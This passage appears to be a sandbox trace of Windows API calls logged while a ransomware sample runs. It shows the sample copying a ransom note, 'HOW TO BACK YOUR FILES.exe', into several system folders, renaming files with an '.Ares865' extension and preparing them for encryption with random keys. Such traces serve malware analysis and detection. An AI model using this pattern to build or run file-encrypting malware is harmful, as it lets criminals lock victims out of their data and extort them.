GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2764) returned 1 [0077.117] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.118] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.118] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.120] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.121] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.121] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred" [0077.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3352e8 | out: hHeap=0x2b0000) returned 1 [0077.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0077.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 72 [0077.121] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred" [0077.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.122] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.126] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.126] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f7a4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f7a4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.127] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.127] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.127] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.Ares865") returned 96 [0077.127] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.128] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=924) returned 1 [0077.128] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.129] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.129] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.130] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.132] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad" [0077.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335248 | out: hHeap=0x2b0000) returned 1 [0077.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0077.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 74 [0077.132] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad" [0077.132] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.132] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.135] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f7a4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f7a4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.135] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.135] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.Ares865") returned 100 [0077.136] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1437) returned 1 [0077.137] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.138] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.138] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.140] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.141] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu" [0077.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0077.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0077.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 72 [0077.141] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu" [0077.141] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.141] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.145] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.145] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f7ca2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f7ca2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.145] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.145] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.145] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.Ares865") returned 96 [0077.145] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.ares865"), dwFlags=0x1) returned 1 [0077.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.147] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=471) returned 1 [0077.147] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.148] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.148] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.150] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.150] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.150] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.151] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers" [0077.151] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0077.151] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0077.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 72 [0077.151] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers" [0077.151] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.151] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.155] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f7f0400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f7f0400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.155] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.155] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.Ares865") returned 92 [0077.155] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1218) returned 1 [0077.157] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.160] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.161] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.161] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.161] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" [0077.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0008 | out: hHeap=0x2b0000) returned 1 [0077.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0077.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 69 [0077.161] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" [0077.161] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.161] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.166] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.166] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f7f0400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f7f0400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.166] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.166] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.166] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.Ares865") returned 86 [0077.166] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.ares865"), dwFlags=0x1) returned 1 [0077.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.168] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3150) returned 1 [0077.168] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.171] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.172] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.Ares865") returned 95 [0077.172] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.ares865"), dwFlags=0x1) returned 1 [0077.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.173] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=247) returned 1 [0077.173] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.177] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.177] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.177] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.178] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.Ares865") returned 92 [0077.178] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.ares865"), dwFlags=0x1) returned 1 [0077.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.179] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3161) returned 1 [0077.179] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.180] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.180] 